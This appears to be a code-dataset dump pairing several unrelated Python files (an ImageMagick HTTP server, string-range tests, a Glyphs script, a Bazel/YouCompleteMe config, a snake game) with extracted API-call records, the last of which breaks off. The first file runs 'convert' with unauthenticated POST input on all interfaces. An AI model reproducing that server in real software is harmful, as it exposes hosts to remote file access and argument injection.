code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
from http.server import BaseHTTPRequestHandler,HTTPServer
from socketserver import ThreadingMixIn
import threading
import subprocess
import urllib.parse
# todo: factor out common server stuff
# todo: these should probably have limited
# access to files, so something like only
# uploads dir may be good.
# then there is slight problem about
# possibility to optimize theme files
# for example (which should be done first,
# but it'd be convenient to reuse this.)
# Maybe allow to mount a theme path
# Collecting args, stripping quotes string for
# it to work with subprocess.Popen
# Assuming only single quoted strings
def append_args(cmd_list, cmd_args):
in_string = False
accum = ""
for i in range(0, len(cmd_args) - 1):
char = cmd_args[i]
if (in_string):
if (char == "'"):
cmd_list.append(accum)
accum = ""
in_string = False
else:
accum = accum + char
else:
if (char == " "):
if (accum != ""):
cmd_list.append(accum)
accum = ""
elif (accum == "" and char == "'"):
in_string = True
else:
accum = accum + char
if (accum != ""):
cmd_list.append(accum)
return cmd_list
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
#subprocess.Popen(["ls", "-la", "/imgs"])
#subprocess.Popen(["id", "-u"])
#subprocess.Popen(["id", "-u", "-n"])
content_length = int(self.headers['Content-Length'])
cmd_args = self.rfile.read(content_length).decode('utf-8')
if len(cmd_args) > 0:
print(cmd_args)
cmd_list = append_args(["convert"], cmd_args)
print(cmd_list)
CmdOut = subprocess.Popen(cmd_list)
(stdout,stderr) = CmdOut.communicate()
print(stdout)
print(stderr)
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write("ok".encode('utf-8'))
#def log_message(self, format, *args):
# suppress logging per request
#return
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
pass
if __name__ == '__main__':
print('Imagemagick server starts')
httpd = ThreadingSimpleServer(('0.0.0.0', 1345), Handler)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print('Imagemagick server stops')
| [
"subprocess.Popen"
] | [((1828, 1854), 'subprocess.Popen', 'subprocess.Popen', (['cmd_list'], {}), '(cmd_list)\n', (1844, 1854), False, 'import subprocess\n')] |
from solution import str_range
def test_same_start_end():
r = str_range('a', 'a')
assert iter(r) == r
assert ''.join(list(r)) == 'a'
def test_simple():
r = str_range('a', 'c')
assert ''.join(list(r)) == 'abc'
def test_simple_with_step():
r = str_range('a', 'c', 2)
assert ''.join(list(r)) == 'ac'
def test_simple_with_negativestep():
r = str_range('c', 'a', -2)
assert ''.join(list(r)) == 'ca'
def test_hebrew():
r = str_range('א', 'ז', 2)
assert ''.join(list(r)) == 'אגהז'
test_same_start_end()
test_simple()
test_simple_with_step()
test_simple_with_negativestep()
test_hebrew()
| [
"solution.str_range"
] | [((68, 87), 'solution.str_range', 'str_range', (['"""a"""', '"""a"""'], {}), "('a', 'a')\n", (77, 87), False, 'from solution import str_range\n'), ((176, 195), 'solution.str_range', 'str_range', (['"""a"""', '"""c"""'], {}), "('a', 'c')\n", (185, 195), False, 'from solution import str_range\n'), ((272, 294), 'solution.str_range', 'str_range', (['"""a"""', '"""c"""', '(2)'], {}), "('a', 'c', 2)\n", (281, 294), False, 'from solution import str_range\n'), ((378, 401), 'solution.str_range', 'str_range', (['"""c"""', '"""a"""', '(-2)'], {}), "('c', 'a', -2)\n", (387, 401), False, 'from solution import str_range\n'), ((467, 489), 'solution.str_range', 'str_range', (['"""א"""', '"""ז"""', '(2)'], {}), "('א', 'ז', 2)\n", (476, 489), False, 'from solution import str_range\n')] |
#MenuTitle: Find And Replace In Anchor Names
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
from builtins import str
__doc__="""
Replaces strings in anchor names of all selected glyphs.
"""
import vanilla
class SearchAndReplaceInAnchorNames( object ):
def __init__( self ):
# Window 'self.w':
windowWidth = 520
windowHeight = 58
windowWidthResize = 0 # user can resize width by this value
windowHeightResize = 0 # user can resize height by this value
self.w = vanilla.FloatingWindow(
( windowWidth, windowHeight ), # default window size
"Search And Replace In Anchor Names", # window title
minSize = ( windowWidth, windowHeight ), # minimum size (for resizing)
maxSize = ( windowWidth + windowWidthResize, windowHeight + windowHeightResize ), # maximum size (for resizing)
autosaveName = "com.mekkablue.SearchAndReplaceInAnchorNames.mainwindow" # stores last window position and size
)
# UI elements:
self.w.textSearch = vanilla.TextBox((15, 12+2, 67, 14), "Search for:", sizeStyle='small')
self.w.searchFor = vanilla.EditText((15+67, 12, 135, 19), "tip", sizeStyle='small')
self.w.textReplace = vanilla.TextBox((225, 12+2, 67, 14), "Replace by:", sizeStyle='small')
self.w.replaceBy = vanilla.EditText((225+67, 12, 135, 19), "top", sizeStyle='small')
self.w.replaceButton = vanilla.Button((-80, 12+1, -15, 17), "Replace", sizeStyle='small', callback=self.SearchAndReplaceInAnchorNamesMain)
self.w.setDefaultButton( self.w.replaceButton )
# Load Settings:
if not self.LoadPreferences():
print("Note: 'Search And Replace In Anchor Names' could not load preferences. Will resort to defaults")
# Open window and focus on it:
self.w.open()
self.w.makeKey()
def SavePreferences( self, sender ):
try:
Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.searchFor"] = self.w.searchFor.get()
Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.replaceBy"] = self.w.replaceBy.get()
except:
return False
return True
def LoadPreferences( self ):
try:
self.w.searchFor.set( Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.searchFor"] )
self.w.replaceBy.set( Glyphs.defaults["com.mekkablue.SearchAndReplaceInAnchorNames.replaceBy"] )
except:
return False
return True
def SearchAndReplaceInAnchorNamesMain( self, sender ):
try:
searchString = self.w.searchFor.get()
replaceString = self.w.replaceBy.get()
thisFont = Glyphs.font # frontmost font
listOfSelectedLayers = thisFont.selectedLayers # active layers of currently selected glyphs
for thisLayer in listOfSelectedLayers: # loop through layers
thisGlyph = thisLayer.parent
reportString = "Anchors renamed in %s:" % thisGlyph.name
displayReportString = False
for thisGlyphLayer in thisGlyph.layers:
for thisAnchor in thisGlyphLayer.anchors:
oldAnchorName = thisAnchor.name
newAnchorName = oldAnchorName.replace( searchString, replaceString )
if oldAnchorName != newAnchorName:
thisAnchor.setName_( newAnchorName )
reportString += "\n layer '%s': %s > %s" % ( thisGlyphLayer.name, oldAnchorName, newAnchorName )
displayReportString = True
if displayReportString:
print(reportString)
if not self.SavePreferences( self ):
print("Note: 'Search And Replace In Anchor Names' could not write preferences.")
self.w.close() # delete if you want window to stay open
except Exception as e:
# brings macro window to front and reports error:
Glyphs.showMacroWindow()
print("Search And Replace In Anchor Names Error: %s" % e)
# brings macro window to front and clears its log:
Glyphs.clearLog()
Glyphs.showMacroWindow()
SearchAndReplaceInAnchorNames()
| [
"vanilla.EditText",
"vanilla.FloatingWindow",
"vanilla.TextBox",
"vanilla.Button"
] | [((523, 815), 'vanilla.FloatingWindow', 'vanilla.FloatingWindow', (['(windowWidth, windowHeight)', '"""Search And Replace In Anchor Names"""'], {'minSize': '(windowWidth, windowHeight)', 'maxSize': '(windowWidth + windowWidthResize, windowHeight + windowHeightResize)', 'autosaveName': '"""com.mekkablue.SearchAndReplaceInAnchorNames.mainwindow"""'}), "((windowWidth, windowHeight),\n 'Search And Replace In Anchor Names', minSize=(windowWidth,\n windowHeight), maxSize=(windowWidth + windowWidthResize, windowHeight +\n windowHeightResize), autosaveName=\n 'com.mekkablue.SearchAndReplaceInAnchorNames.mainwindow')\n", (545, 815), False, 'import vanilla\n'), ((1008, 1079), 'vanilla.TextBox', 'vanilla.TextBox', (['(15, 12 + 2, 67, 14)', '"""Search for:"""'], {'sizeStyle': '"""small"""'}), "((15, 12 + 2, 67, 14), 'Search for:', sizeStyle='small')\n", (1023, 1079), False, 'import vanilla\n'), ((1099, 1165), 'vanilla.EditText', 'vanilla.EditText', (['(15 + 67, 12, 135, 19)', '"""tip"""'], {'sizeStyle': '"""small"""'}), "((15 + 67, 12, 135, 19), 'tip', sizeStyle='small')\n", (1115, 1165), False, 'import vanilla\n'), ((1190, 1262), 'vanilla.TextBox', 'vanilla.TextBox', (['(225, 12 + 2, 67, 14)', '"""Replace by:"""'], {'sizeStyle': '"""small"""'}), "((225, 12 + 2, 67, 14), 'Replace by:', sizeStyle='small')\n", (1205, 1262), False, 'import vanilla\n'), ((1282, 1349), 'vanilla.EditText', 'vanilla.EditText', (['(225 + 67, 12, 135, 19)', '"""top"""'], {'sizeStyle': '"""small"""'}), "((225 + 67, 12, 135, 19), 'top', sizeStyle='small')\n", (1298, 1349), False, 'import vanilla\n'), ((1374, 1495), 'vanilla.Button', 'vanilla.Button', (['(-80, 12 + 1, -15, 17)', '"""Replace"""'], {'sizeStyle': '"""small"""', 'callback': 'self.SearchAndReplaceInAnchorNamesMain'}), "((-80, 12 + 1, -15, 17), 'Replace', sizeStyle='small',\n callback=self.SearchAndReplaceInAnchorNamesMain)\n", (1388, 1495), False, 'import vanilla\n')] |
#!/usr/bin/python
# Copyright 2018 GRAIL, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Configuration file for YouCompleteMe to fetch C++ compilation flags from
Bazel.
See https://github.com/ycm-core/YouCompleteMe#c-family-semantic-completion for
how YCM works. In that section:
For Option 1 (compilation database), use the generate.sh script in this
repository.
For Option 2 (.ycm_extra_conf.py), symlink this file to the root of your
workspace and bazel's output_base, or set it as your global config.
"""
from __future__ import print_function
import json
import os
import re
import shlex
import subprocess
import sys
import xml.etree.ElementTree as ElementTree
_BAZEL = os.getenv("BAZEL_COMPDB_BAZEL_PATH") or "bazel"
def bazel_info():
"""Returns a dict containing key values from bazel info."""
bazel_info_dict = dict()
try:
out = subprocess.check_output([_BAZEL, 'info']).decode('utf-8').strip().split('\n')
except subprocess.CalledProcessError as err:
# This exit code is returned when this command is run outside of a bazel workspace.
if err.returncode == 2:
sys.exit(0)
for line in out:
key_val = line.strip().partition(": ")
bazel_info_dict[key_val[0]] = key_val[2]
return bazel_info_dict
def bazel_query(args):
"""Executes bazel query with the given args and returns the output."""
# TODO: switch to cquery when it supports siblings and less crash-y with external repos.
query_cmd = [_BAZEL, 'query'] + args
proc = subprocess.Popen(query_cmd, stdout=subprocess.PIPE)
return proc.communicate()[0].decode('utf-8')
def file_to_target(filepath):
"""Returns a string that works as a bazel target specification for the given file."""
if not filepath.startswith("external/"):
# The file path relative to repo root works for genfiles and binfiles too.
return filepath
# For external repos, we have to find the owner package manually.
repo_prefix = re.sub('external/([^/]*).*', '@\\1//', filepath)
filepath = re.sub('external/[^/]*/', '', filepath)
# Find out which package is the owner of this file.
query_result = bazel_query(['-k', repo_prefix+'...', '--output=package'])
packages = [package.strip() for package in query_result.split('\n')]
owner = ""
for package in packages:
package = package[len(repo_prefix):]
if filepath.startswith(package) and len(package) > len(owner):
owner = package
return repo_prefix + owner + ":" + os.path.relpath(filepath, owner)
def standardize_file_target(file_target):
"""For file targets that are not source files, return the target that generated them.
This is needed because rdeps of generated files do not include targets that reference
their generating rules.
https://github.com/bazelbuild/bazel/issues/4949
"""
query_result = bazel_query(['--output=xml', file_target])
if not query_result:
sys.exit("Empty query response for {}. It is probably not handled by bazel".format(file_target))
target_xml = ElementTree.fromstringlist(query_result.split('\n'))
source_element = target_xml.find('source-file')
if source_element is not None:
return file_target
generated_element = target_xml.find('generated-file')
if generated_element is not None:
return generated_element.get('generating-rule')
sys.exit("Error parsing query xml for " + file_target + ":\n" + query_result)
def get_aspects_filepath(label, bazel_bin):
"""Gets the file path for the generated aspects file that contains the
compile commands json entries.
"""
target_path = re.sub(':', '/', label)
target_path = re.sub('^@(.*)//', 'external/\\1/', target_path)
target_path = re.sub('^/*', '', target_path)
relative_file_path = target_path + '.compile_commands.json'
return os.path.join(bazel_bin, *relative_file_path.split('/'))
def get_compdb_json(aspects_filepath, bazel_exec_root):
"""Returns the JSON string read from the file after necessary processing."""
compdb_json_str = "[\n"
with open(aspects_filepath, 'r') as aspects_file:
compdb_json_str += aspects_file.read()
compdb_json_str += "\n]"
return re.sub('__EXEC_ROOT__', bazel_exec_root, compdb_json_str)
def get_flags(filepath, compdb_json_str):
"""Gets the compile command flags from the compile command for the file."""
compdb_dict = json.loads(compdb_json_str)
for entry in compdb_dict:
if entry['file'] != filepath:
continue
command = entry['command']
return shlex.split(command)[1:]
# This could imply we are fetching the wrong compile_commands.json or there
# is a bug in aspects.bzl.
sys.exit("File {f} not present in the compilation database".format(f=filepath))
def standardize_flags(flags, bazel_workspace):
"""Modifies flags obtained from the compile command for compilation outside of bazel."""
# We need to add the workspace directly because the files symlinked in the
# execroot during a build disappear after a different build action.
flags.extend(['-iquote', bazel_workspace])
return flags
def cfamily_settings(filename):
"""Returns C-family settings as a dict with at least a 'flags' key that
points to an array of strings as flags.
"""
bazel_info_dict = bazel_info()
bazel_bin = bazel_info_dict['bazel-bin']
bazel_genfiles = bazel_info_dict['bazel-genfiles']
bazel_exec_root = bazel_info_dict['execution_root']
bazel_workspace = bazel_info_dict['workspace']
os.chdir(bazel_workspace)
# Valid prefixes for the file, in decreasing order of specificity.
file_prefix = [p for p in [bazel_genfiles, bazel_bin, bazel_exec_root, bazel_workspace]
if filename.startswith(p)]
if not file_prefix:
sys.exit("Not a valid file: " + filename)
filepath = os.path.relpath(filename, file_prefix[0])
file_target = standardize_file_target(file_to_target(filepath))
# File path relative to execroot, as it will appear in the compile command.
if file_prefix[0].startswith(bazel_exec_root):
filepath = os.path.relpath(filename, bazel_exec_root)
cc_rules = "cc_(library|binary|test|inc_library|proto_library)"
query_result = bazel_query([('kind("{cc_rules}", rdeps(siblings({f}), {f}, 1))'
.format(f=file_target, cc_rules=cc_rules)), '--keep_going'])
labels = [label.partition(" ")[0] for label in query_result.split('\n') if label]
if not labels:
sys.exit("No cc rules depend on this source file.")
repository_override = '--override_repository=bazel_compdb=' + os.path.dirname(
os.path.realpath(__file__))
aspect_definition = '--aspects=@bazel_compdb//:aspects.bzl%compilation_database_aspect'
bazel_aspects = [
_BAZEL,
'build',
aspect_definition,
repository_override,
'--output_groups=compdb_files,header_files',
] + labels
proc = subprocess.Popen(bazel_aspects, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
errors = [e for e in out.splitlines() + err.splitlines()
if e.startswith("ERROR:")]
if errors:
raise Exception('/'.join(errors))
else:
raise Exception(err)
aspects_filepath = get_aspects_filepath(labels[0], bazel_bin)
compdb_json = get_compdb_json(aspects_filepath, bazel_exec_root)
flags = standardize_flags(get_flags(filepath, compdb_json), bazel_workspace)
return {
'flags': flags,
'include_paths_relative_to_dir': bazel_exec_root,
}
#pylint: disable=C0103
def Settings(**kwargs):
"""Function that is called by YCM with language and filename arguments,
and expects a dict of language-specific settings.
"""
if kwargs['language'] == 'cfamily':
return cfamily_settings(kwargs['filename'])
return {}
# For testing; needs exactly one argument as path of file.
if __name__ == '__main__':
filename = os.path.abspath(sys.argv[1])
print(Settings(language='cfamily', filename=filename))
| [
"subprocess.check_output",
"json.loads",
"os.getenv",
"shlex.split",
"subprocess.Popen",
"os.chdir",
"os.path.realpath",
"sys.exit",
"os.path.abspath",
"re.sub",
"os.path.relpath"
] | [((1188, 1224), 'os.getenv', 'os.getenv', (['"""BAZEL_COMPDB_BAZEL_PATH"""'], {}), "('BAZEL_COMPDB_BAZEL_PATH')\n", (1197, 1224), False, 'import os\n'), ((2039, 2090), 'subprocess.Popen', 'subprocess.Popen', (['query_cmd'], {'stdout': 'subprocess.PIPE'}), '(query_cmd, stdout=subprocess.PIPE)\n', (2055, 2090), False, 'import subprocess\n'), ((2502, 2550), 're.sub', 're.sub', (['"""external/([^/]*).*"""', '"""@\\\\1//"""', 'filepath'], {}), "('external/([^/]*).*', '@\\\\1//', filepath)\n", (2508, 2550), False, 'import re\n'), ((2566, 2605), 're.sub', 're.sub', (['"""external/[^/]*/"""', '""""""', 'filepath'], {}), "('external/[^/]*/', '', filepath)\n", (2572, 2605), False, 'import re\n'), ((3924, 4001), 'sys.exit', 'sys.exit', (["('Error parsing query xml for ' + file_target + ':\\n' + query_result)"], {}), "('Error parsing query xml for ' + file_target + ':\\n' + query_result)\n", (3932, 4001), False, 'import sys\n'), ((4184, 4207), 're.sub', 're.sub', (['""":"""', '"""/"""', 'label'], {}), "(':', '/', label)\n", (4190, 4207), False, 'import re\n'), ((4226, 4274), 're.sub', 're.sub', (['"""^@(.*)//"""', '"""external/\\\\1/"""', 'target_path'], {}), "('^@(.*)//', 'external/\\\\1/', target_path)\n", (4232, 4274), False, 'import re\n'), ((4293, 4323), 're.sub', 're.sub', (['"""^/*"""', '""""""', 'target_path'], {}), "('^/*', '', target_path)\n", (4299, 4323), False, 'import re\n'), ((4763, 4820), 're.sub', 're.sub', (['"""__EXEC_ROOT__"""', 'bazel_exec_root', 'compdb_json_str'], {}), "('__EXEC_ROOT__', bazel_exec_root, compdb_json_str)\n", (4769, 4820), False, 'import re\n'), ((4963, 4990), 'json.loads', 'json.loads', (['compdb_json_str'], {}), '(compdb_json_str)\n', (4973, 4990), False, 'import json\n'), ((6118, 6143), 'os.chdir', 'os.chdir', (['bazel_workspace'], {}), '(bazel_workspace)\n', (6126, 6143), False, 'import os\n'), ((6443, 6484), 'os.path.relpath', 'os.path.relpath', (['filename', 'file_prefix[0]'], {}), '(filename, file_prefix[0])\n', (6458, 6484), False, 'import os\n'), ((7565, 7644), 'subprocess.Popen', 'subprocess.Popen', (['bazel_aspects'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), '(bazel_aspects, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n', (7581, 7644), False, 'import subprocess\n'), ((8648, 8676), 'os.path.abspath', 'os.path.abspath', (['sys.argv[1]'], {}), '(sys.argv[1])\n', (8663, 8676), False, 'import os\n'), ((3043, 3075), 'os.path.relpath', 'os.path.relpath', (['filepath', 'owner'], {}), '(filepath, owner)\n', (3058, 3075), False, 'import os\n'), ((6385, 6426), 'sys.exit', 'sys.exit', (["('Not a valid file: ' + filename)"], {}), "('Not a valid file: ' + filename)\n", (6393, 6426), False, 'import sys\n'), ((6704, 6746), 'os.path.relpath', 'os.path.relpath', (['filename', 'bazel_exec_root'], {}), '(filename, bazel_exec_root)\n', (6719, 6746), False, 'import os\n'), ((7109, 7160), 'sys.exit', 'sys.exit', (['"""No cc rules depend on this source file."""'], {}), "('No cc rules depend on this source file.')\n", (7117, 7160), False, 'import sys\n'), ((5130, 5150), 'shlex.split', 'shlex.split', (['command'], {}), '(command)\n', (5141, 5150), False, 'import shlex\n'), ((7253, 7279), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (7269, 7279), False, 'import os\n'), ((1636, 1647), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1644, 1647), False, 'import sys\n'), ((1373, 1414), 'subprocess.check_output', 'subprocess.check_output', (["[_BAZEL, 'info']"], {}), "([_BAZEL, 'info'])\n", (1396, 1414), False, 'import subprocess\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import glob
import os
import pygame
import random
import subprocess
import time
import maze_map
MIN_MARGIN = 32
PROGRESS_BAR_HEIGHT = 8
SELF_DIR = os.path.dirname(os.path.realpath(__file__))
class Game:
def __init__(self, map_size: int, maze: bool, video_ending: bool, surface):
self._map_size = map_size
self._surface = surface
self._video_ending = video_ending
self._maze_map = maze_map.MazeMap(map_size, map_size, maze)
surface_width, surface_height = surface.get_size()
assert surface_width >= surface_height
self._grid_size = (
surface_height - MIN_MARGIN * 2 - PROGRESS_BAR_HEIGHT) // map_size
if self._grid_size % 2 == 0:
self._grid_size -= 1 # make sure self._grid_size is odd
assert self._grid_size > 0
self._left = (surface_width - map_size * self._grid_size) // 2
self._top = (surface_height -
map_size * self._grid_size) // 2 + PROGRESS_BAR_HEIGHT
self._food_imgs = self._load_food_imgs()
self._ending_img = self._load_ending_img()
self._mplayer_proc = None
self._snake_pos = [(map_size // 2, map_size // 2)] * 2
self._food_pos = self._gen_food_pos()
self._food_img = random.choice(self._food_imgs)
self._is_ended = False
self._ending_length = min(
self._maze_map.x_size() * 2,
self._maze_map.x_size() * self._maze_map.y_size() // 2)
self._background_songs = glob.glob(SELF_DIR + '/bgmusic/*.mp3')
assert self._background_songs
random.shuffle(self._background_songs)
self._play_background_music()
def __del__(self):
if self._mplayer_proc:
self._mplayer_proc.kill()
def _gen_food_pos(self):
while True:
food_pos = (random.randint(0,
self._maze_map.x_size() - 1),
random.randint(0,
self._maze_map.y_size() - 1))
if food_pos not in self._snake_pos:
return food_pos
def _load_food_imgs(self):
img_files = glob.glob(SELF_DIR + '/food_img/*.png')
assert img_files
imgs = []
for img_file in img_files:
imgs.append(
pygame.transform.scale(
pygame.image.load(img_file),
(self._grid_size, self._grid_size)))
return imgs
def _load_ending_img(self):
img_size = min(self._surface.get_size())
return pygame.transform.scale(
pygame.image.load(SELF_DIR + '/ending.png'), (img_size, img_size))
def _play_background_music(self):
if self._is_ended:
pygame.mixer.music.load(SELF_DIR + '/ending.mp3')
pygame.mixer.music.set_volume(1.0)
pygame.mixer.music.play(-1)
else:
pygame.mixer.music.load(self._background_songs[0])
pygame.mixer.music.set_volume(0.4)
pygame.mixer.music.play(-1)
self._background_songs = self._background_songs[1:] + [
self._background_songs[0]
]
def update(self, direction):
if self._is_ended:
return
if direction:
assert direction in self._maze_map.directions()
if not self._maze_map.is_connected(self._snake_pos[0], direction):
return
new_head_pos = (self._snake_pos[0][0] + direction[0],
self._snake_pos[0][1] + direction[1])
if new_head_pos == self._food_pos:
self._snake_pos = [new_head_pos] + self._snake_pos
if len(self._snake_pos) >= self._ending_length:
self._is_ended = True
if self._video_ending:
pygame.mixer.music.stop()
self._mplayer_proc = subprocess.Popen(
['vlc', '-f', SELF_DIR + '/ending.mp4'])
else:
self._play_background_music()
else:
self._food_pos = self._gen_food_pos()
self._food_img = random.choice(self._food_imgs)
self._play_background_music()
else:
self._snake_pos = [new_head_pos] + self._snake_pos[:-1]
self._surface.fill(pygame.Color(0, 0, 0))
if self._is_ended:
surface_width, surface_height = self._surface.get_size()
assert surface_width >= surface_height
self._surface.blit(self._ending_img,
((surface_width - surface_height) // 2, 0))
else:
grid_color = pygame.Color(20, 20, 20)
wall_color = pygame.Color(255, 255, 255)
head_color = pygame.Color(100, 255, 100)
body_color = pygame.Color(80, 160, 80)
# progress bar
progress_bar_length = self._surface.get_width() * len(
self._snake_pos) // self._ending_length
self._surface.fill(
head_color,
pygame.Rect(0, 0, progress_bar_length, PROGRESS_BAR_HEIGHT))
for x in range(self._map_size + 1):
pygame.draw.line(self._surface, grid_color,
(self._left + x * self._grid_size, self._top),
(self._left + x * self._grid_size,
self._top + self._map_size * self._grid_size))
for y in range(self._map_size + 1):
pygame.draw.line(self._surface, grid_color,
(self._left, self._top + y * self._grid_size),
(self._left + self._map_size * self._grid_size,
self._top + y * self._grid_size))
for x in range(self._map_size + 1):
for y in range(self._map_size):
if x == self._map_size or not self._maze_map.is_connected(
(x, y), (-1, 0)):
pygame.draw.line(
self._surface, wall_color,
(self._left + x * self._grid_size,
self._top + y * self._grid_size),
(self._left + x * self._grid_size,
self._top + (y + 1) * self._grid_size), 3)
for y in range(self._map_size + 1):
for x in range(self._map_size):
if y == self._map_size or not self._maze_map.is_connected(
(x, y), (0, -1)):
pygame.draw.line(
self._surface, wall_color,
(self._left + x * self._grid_size,
self._top + y * self._grid_size),
(self._left + (x + 1) * self._grid_size,
self._top + y * self._grid_size), 3)
for i, pos in reversed(list(enumerate(self._snake_pos))):
if i == 0: # head
radius = int(self._grid_size * 0.45)
color = head_color
else:
radius = int(self._grid_size * 0.3)
color = body_color
pygame.draw.circle(
self._surface, color,
(self._left + pos[0] * self._grid_size +
self._grid_size // 2 + 1, self._top +
pos[1] * self._grid_size + self._grid_size // 2 + 1),
radius)
self._surface.blit(
self._food_img,
(self._left + self._food_pos[0] * self._grid_size,
self._top + self._food_pos[1] * self._grid_size))
pygame.display.flip()
def is_ended(self) -> bool:
return self._is_ended
def main():
parser = argparse.ArgumentParser(description='Snake')
parser.add_argument('--map_size', type=int, default=6)
parser.add_argument('--maze', action='store_true')
parser.add_argument('--video_ending', action='store_true')
args = parser.parse_args()
pygame.init()
pygame.display.set_caption("Snake")
pygame.mouse.set_visible(False)
surface = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)
game = Game(args.map_size, args.maze, args.video_ending, surface)
while True:
event = pygame.event.wait()
if event.type == pygame.QUIT:
break
direction = None
if event.type == pygame.KEYDOWN:
mods = pygame.key.get_mods()
if mods & pygame.KMOD_CTRL and event.key == pygame.K_q:
break
if event.key == pygame.K_SPACE and game.is_ended():
del game
args.map_size += 1
game = Game(args.map_size, args.maze, args.video_ending,
surface)
continue
if event.key == pygame.K_LEFT:
direction = (-1, 0)
elif event.key == pygame.K_RIGHT:
direction = (1, 0)
elif event.key == pygame.K_UP:
direction = (0, -1)
elif event.key == pygame.K_DOWN:
direction = (0, 1)
game.update(direction)
pygame.quit()
if __name__ == '__main__':
main()
| [
"pygame.init",
"pygame.quit",
"pygame.key.get_mods",
"pygame.mixer.music.set_volume",
"argparse.ArgumentParser",
"pygame.display.set_mode",
"pygame.display.flip",
"subprocess.Popen",
"maze_map.MazeMap",
"pygame.image.load",
"pygame.mixer.music.load",
"pygame.Rect",
"glob.glob",
"random.cho... | [((229, 255), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (245, 255), False, 'import os\n'), ((8055, 8099), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Snake"""'}), "(description='Snake')\n", (8078, 8099), False, 'import argparse\n'), ((8313, 8326), 'pygame.init', 'pygame.init', ([], {}), '()\n', (8324, 8326), False, 'import pygame\n'), ((8331, 8366), 'pygame.display.set_caption', 'pygame.display.set_caption', (['"""Snake"""'], {}), "('Snake')\n", (8357, 8366), False, 'import pygame\n'), ((8371, 8402), 'pygame.mouse.set_visible', 'pygame.mouse.set_visible', (['(False)'], {}), '(False)\n', (8395, 8402), False, 'import pygame\n'), ((8417, 8467), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(0, 0)', 'pygame.FULLSCREEN'], {}), '((0, 0), pygame.FULLSCREEN)\n', (8440, 8467), False, 'import pygame\n'), ((9458, 9471), 'pygame.quit', 'pygame.quit', ([], {}), '()\n', (9469, 9471), False, 'import pygame\n'), ((486, 528), 'maze_map.MazeMap', 'maze_map.MazeMap', (['map_size', 'map_size', 'maze'], {}), '(map_size, map_size, maze)\n', (502, 528), False, 'import maze_map\n'), ((1337, 1367), 'random.choice', 'random.choice', (['self._food_imgs'], {}), '(self._food_imgs)\n', (1350, 1367), False, 'import random\n'), ((1577, 1615), 'glob.glob', 'glob.glob', (["(SELF_DIR + '/bgmusic/*.mp3')"], {}), "(SELF_DIR + '/bgmusic/*.mp3')\n", (1586, 1615), False, 'import glob\n'), ((1662, 1700), 'random.shuffle', 'random.shuffle', (['self._background_songs'], {}), '(self._background_songs)\n', (1676, 1700), False, 'import random\n'), ((2236, 2275), 'glob.glob', 'glob.glob', (["(SELF_DIR + '/food_img/*.png')"], {}), "(SELF_DIR + '/food_img/*.png')\n", (2245, 2275), False, 'import glob\n'), ((7943, 7964), 'pygame.display.flip', 'pygame.display.flip', ([], {}), '()\n', (7962, 7964), False, 'import pygame\n'), ((8571, 8590), 'pygame.event.wait', 'pygame.event.wait', ([], {}), '()\n', (8588, 8590), False, 'import pygame\n'), ((2678, 2721), 'pygame.image.load', 'pygame.image.load', (["(SELF_DIR + '/ending.png')"], {}), "(SELF_DIR + '/ending.png')\n", (2695, 2721), False, 'import pygame\n'), ((2823, 2872), 'pygame.mixer.music.load', 'pygame.mixer.music.load', (["(SELF_DIR + '/ending.mp3')"], {}), "(SELF_DIR + '/ending.mp3')\n", (2846, 2872), False, 'import pygame\n'), ((2885, 2919), 'pygame.mixer.music.set_volume', 'pygame.mixer.music.set_volume', (['(1.0)'], {}), '(1.0)\n', (2914, 2919), False, 'import pygame\n'), ((2932, 2959), 'pygame.mixer.music.play', 'pygame.mixer.music.play', (['(-1)'], {}), '(-1)\n', (2955, 2959), False, 'import pygame\n'), ((2986, 3036), 'pygame.mixer.music.load', 'pygame.mixer.music.load', (['self._background_songs[0]'], {}), '(self._background_songs[0])\n', (3009, 3036), False, 'import pygame\n'), ((3049, 3083), 'pygame.mixer.music.set_volume', 'pygame.mixer.music.set_volume', (['(0.4)'], {}), '(0.4)\n', (3078, 3083), False, 'import pygame\n'), ((3096, 3123), 'pygame.mixer.music.play', 'pygame.mixer.music.play', (['(-1)'], {}), '(-1)\n', (3119, 3123), False, 'import pygame\n'), ((4487, 4508), 'pygame.Color', 'pygame.Color', (['(0)', '(0)', '(0)'], {}), '(0, 0, 0)\n', (4499, 4508), False, 'import pygame\n'), ((4821, 4845), 'pygame.Color', 'pygame.Color', (['(20)', '(20)', '(20)'], {}), '(20, 20, 20)\n', (4833, 4845), False, 'import pygame\n'), ((4871, 4898), 'pygame.Color', 'pygame.Color', (['(255)', '(255)', '(255)'], {}), '(255, 255, 255)\n', (4883, 4898), False, 'import pygame\n'), ((4924, 4951), 'pygame.Color', 'pygame.Color', (['(100)', '(255)', '(100)'], {}), '(100, 255, 100)\n', (4936, 4951), False, 'import pygame\n'), ((4977, 5002), 'pygame.Color', 'pygame.Color', (['(80)', '(160)', '(80)'], {}), '(80, 160, 80)\n', (4989, 5002), False, 